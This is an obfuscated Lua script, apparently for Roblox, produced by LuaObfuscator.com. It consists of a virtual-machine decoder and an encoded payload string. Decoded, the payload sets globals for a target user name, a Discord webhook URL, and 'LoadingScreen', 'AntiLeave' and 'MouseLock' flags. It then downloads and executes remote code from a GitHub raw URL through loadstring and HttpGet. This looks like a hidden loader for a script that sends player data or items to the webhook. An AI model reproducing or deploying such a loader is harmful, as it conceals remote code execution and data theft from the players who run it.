--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==1) then return (v34 * (732 -476)) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + (4 -2) );v19=v19 + (621 -(555 + 64)) ;v32=(1500 -(367 + 201)) -(857 + 74) ;end end end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=928 -(214 + 713) ;local v38=(v21(v36,(1 -0) + 0 ,(9 + 38) -(47 -20) ) * ((1 + 0 + (792 -(368 + 423)))^(909 -(282 + 595)))) + v35 ;local v39=v21(v36,(5210 -3552) -(1523 + (132 -(10 + 8))) ,56 -25 );local v40=((v21(v36,382 -(87 + 263) )==(1 + 0)) and  -((3 -2) + 0)) or (2 -1) ;if (v39==(0 + 0)) then if (v38==(0 -0)) then return v40 * (0 -0) ;else v39=1066 -(68 + (1439 -(416 + 26))) ;v37=1270 -(226 + 1044) ;end elseif (v39==(8913 -6866)) then return ((v38==(997 -(915 + 82))) and (v40 * ((2 -1)/(117 -(32 + 85))))) or (v40 * NaN) ;end return v8(v40,v39-(1344 -321) ) * (v37 + (v38/(((3796 -2607) -(1069 + 118))^(51 + 1)))) ;end v26=nil;function v26(v41)local v42;if  not v41 then local v69=0 + (772 -(201 + 571)) ;while true do if (v69==(1486 -(998 + 488))) then v41=v24();if (v41==(0 + 0)) then return "";end break;end end end v42=v3(v16,v19,(v19 + v41) -(1 -0) );v19=v19 + v41 ;local v43={};for v67=439 -(145 + 293) , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=1335 -(178 + 1157) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44~=(2 + 1)) then else v51=nil;while true do if (v45==(0 + 0)) then local v95=0 -0 ;local v96;while true do if ((1262 -(1091 + 171))~=v95) then else v96=0 + 0 ;while true do if (v96~=(2 -1)) then else local v112=0;while true do if (v112==1) then v96=1 + 1 ;break;end if (v112==(1024 -(706 + 318))) then v48={};v49={v46,v47,nil,v48};v112=3 -2 ;end end end if ((374 -(123 + 251))~=v96) then else local v113=0 -0 ;while true do if (v113==(698 -(208 + 490))) then v46={};v47={};v113=1;end if (v113~=(1 + 0)) then else v96=1;break;end end end if ((1 + 1)==v96) then v45=1 + 0 ;break;end end break;end end end if (v45==(838 -(660 + 176))) then local v97=0 + 0 ;while true do local v99=1086 -(461 + 625) ;while true do if (v99==0) then if (v97==0) then local v114=1288 -(993 + 295) ;while true do if (v114==(202 -(14 + 188))) then for v128=1,v24() do local v129=0;local v130;local v131;while true do if (v129~=(1 + 0)) then else while true do if (v130==0) then v131=v22();if (v21(v131,676 -(534 + 141) ,1172 -(418 + 753) )==(0 + 0)) then local v193=0 + 0 ;local v194;local v195;local v196;local v197;while true do if (v193==(0 + 0)) then v194=0 + 0 ;v195=nil;v193=1 + 0 ;end if (v193==(1 + 0)) then v196=nil;v197=nil;v193=1771 -(1749 + 20) ;end if (2==v193) then while true do if (v194~=(1 -0)) then else v197={v23(),v23(),nil,nil};if (v195==(0 + 0)) then local v201=0 + 0 ;local v202;local v203;while true do if (v201==(396 -(115 + 281))) then v202=0 -0 ;v203=nil;v201=1146 -(466 + 679) ;end if ((2 -1)==v201) then while true do if (v202==0) then v203=0 + 0 ;while true do if (v203==(0 -0)) then v197[7 -4 ]=v23();v197[2 + 2 ]=v23();break;end end break;end end break;end end elseif (v195==(3 -2)) then v197[870 -(550 + 317) ]=v24();elseif (v195==(5 -3)) then v197[3 -0 ]=v24() -(2^(130 -(4 + 110))) ;elseif (v195==3) then local v208=584 -(57 + 527) ;local v209;local v210;local v211;while true do if ((0 -0)==v208) then v209=0 -0 ;v210=nil;v208=286 -(134 + 151) ;end if (v208==(1666 -(970 + 695))) then v211=nil;while true do if (v209==(0 + 0)) then local v218=0 -0 ;while true do if (v218~=(1991 -(582 + 1408))) then else v209=1;break;end if (v218==(0 -0)) then v210=0;v211=nil;v218=2 -1 ;end end end if (v209==(167 -(122 + 44))) then while true do if (v210~=(0 -0)) then else v211=0;while true do if (0~=v211) then else v197[11 -8 ]=v24() -(2^16) ;v197[4]=v23();break;end end break;end end break;end end break;end end end v194=1826 -(1195 + 629) ;end if (v194~=2) then else local v198=0 -0 ;local v199;while true do if (v198~=(0 + 0)) then else v199=241 -(187 + 54) ;while true do if ((780 -(162 + 618))==v199) then if (v21(v196,1 -0 ,66 -(30 + 35) )~=(1 + 0)) then else v197[2]=v51[v197[2 + 0 ]];end if (v21(v196,2 + 0 ,2)==(1 -0)) then v197[3]=v51[v197[3]];end v199=1;end if (v199~=(1258 -(1043 + 214))) then else v194=4 -1 ;break;end end break;end end end if (v194==(0 + 0)) then v195=v21(v131,1638 -(1373 + 263) ,1003 -(451 + 549) );v196=v21(v131,10 -6 ,6);v194=581 -(361 + 219) ;end if (v194==(323 -(53 + 267))) then if (v21(v196,1 + 2 ,1 + 2 )==1) then v197[5 -1 ]=v51[v197[6 -2 ]];end v46[v128]=v197;break;end end break;end end end break;end end break;end if (v129~=(1384 -(746 + 638))) then else v130=0 + 0 ;v131=nil;v129=1;end end end for v132=1 -0 ,v24() do v47[v132-1 ]=v29();end v114=342 -(218 + 123) ;end if ((851 -(20 + 830))~=v114) then else v97=1 + 0 ;break;end end end if (v97==(127 -(116 + 10))) then return v49;end break;end end end end if (v45~=(1582 -(1535 + 46))) then else local v98=0;while true do if (v98==(1 + 0)) then for v107=1 + 0 ,v50 do local v108=0 + 0 ;local v109;local v110;local v111;while true do if (v108~=(0 + 0)) then else v109=560 -(306 + 254) ;v110=nil;v108=1 + 0 ;end if (1==v108) then v111=nil;while true do if (v109~=(0 -0)) then else local v134=1467 -(899 + 568) ;while true do if (v134==0) then v110=v22();v111=nil;v134=2 -1 ;end if (1==v134) then v109=1 + 0 ;break;end end end if (v109~=(1552 -(1126 + 425))) then else if (v110==(2 -1)) then v111=v22()~=0 ;elseif (v110==2) then v111=v25();elseif (v110==3) then v111=v26();end v51[v107]=v111;break;end end break;end end end v49[11 -8 ]=v22();v98=2;end if (2==v98) then v45=605 -(268 + 335) ;break;end if (v98==0) then v50=v24();v51={};v98=1122 -(118 + 1003) ;end end end end break;end if (v44==(0 -0)) then v45=0;v46=nil;v44=378 -(142 + 235) ;end if (v44==(292 -(60 + 230))) then v49=nil;v50=nil;v44=13 -10 ;end if (v44==(573 -(426 + 146))) then v47=nil;v48=nil;v44=2;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v52,1,1));return "";end end else local v71=v2(v0(v52,16));if v20 then local v78=v5(v71,v20);v20=nil;return v78;else return v71;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + (980 -(553 + 424)) );v19=v19 + (7 -3) ;return (v56 * 16777216) + (v55 * (57732 + 7804)) + (v54 * 256) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==1) then v63=v57[3];return function(...)local v79=v61;local v80=v62;local v81=v63;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then local v115=0;local v116;local v117;while true do if (v115==1) then v89[v116 + 1 ]=v117;v89[v116]=v117[v91[4]];break;end if (v115==0) then v116=v91[2];v117=v89[v91[3]];v115=1;end end elseif (v92==1) then do return;end else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=3) then local v118=0;local v119;local v120;local v121;local v122;local v123;while true do if (v118==4) then v89[v123]=v122[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v118=5;end if (v118==2) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v59[v91[3]];v83=v83 + 1 ;v118=3;end if (v118==0) then v119=nil;v120,v121=nil;v122=nil;v123=nil;v118=1;end if (v118==9) then v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end break;end if (v118==3) then v91=v79[v83];v123=v91[2];v122=v89[v91[3]];v89[v123 + 1 ]=v122;v118=4;end if (v118==8) then v123=v91[2];v89[v123]=v89[v123](v13(v89,v123 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v118=9;end if (v118==6) then v91=v79[v83];v123=v91[2];v120,v121=v82(v89[v123](v13(v89,v123 + 1 ,v91[3])));v84=(v121 + v123) -1 ;v118=7;end if (v118==1) then v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v59[v91[3]];v118=2;end if (v118==7) then v119=0;for v189=v123,v84 do local v190=0;while true do if (v190==0) then v119=v119 + 1 ;v89[v189]=v120[v119];break;end end end v83=v83 + 1 ;v91=v79[v83];v118=8;end if (v118==5) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v118=6;end end elseif (v92==4) then local v137=v91[2];local v138,v139=v82(v89[v137](v13(v89,v137 + 1 ,v91[3])));v84=(v139 + v137) -1 ;local v140=0;for v184=v137,v84 do v140=v140 + 1 ;v89[v184]=v138[v140];end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=8) then if (v92<=6) then v89[v91[2]]=v59[v91[3]];elseif (v92==7) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v59[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v59[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v59[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v59[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v59[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]]=v91[3];end elseif (v92<=9) then local v126=0;local v127;while true do if (v126==0) then v127=v91[2];v89[v127]=v89[v127](v13(v89,v127 + 1 ,v84));break;end end elseif (v92>10) then v59[v91[3]]=v89[v91[2]];else v89[v91[2]]();end v83=v83 + 1 ;break;end end end end;end if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v72=0 + 0 ;local v73;while true do if (v72==(0 + 0)) then v73=(v64/(2^(v65-((1330 -(797 + 532)) + 0))))%((2 + 0 + 0)^(((v66-(2 -1)) -(v65-(2 -1))) + (2 -1))) ;return v73-(v73%(1 + 0)) ;end end else local v74=(9 -7)^(v65-1) ;return (((v64%(v74 + v74))>=v74) and (754 -(174 + 65 + 514))) or 0 ;end end v22=nil;v18=2;end end end v15("LOL!0E3O0003083O00557365724E616D6503113O004C752O66795F74726F70696E686131323303073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F2O31333136392O3834363537383235383032312F7650696830613763503750366133704A4974583069636557616851654E6A596C70436B76444A3048592O6D6557507463304E436C6452383541364F476756577149384A5203093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012073O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012063O00063O0030033O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
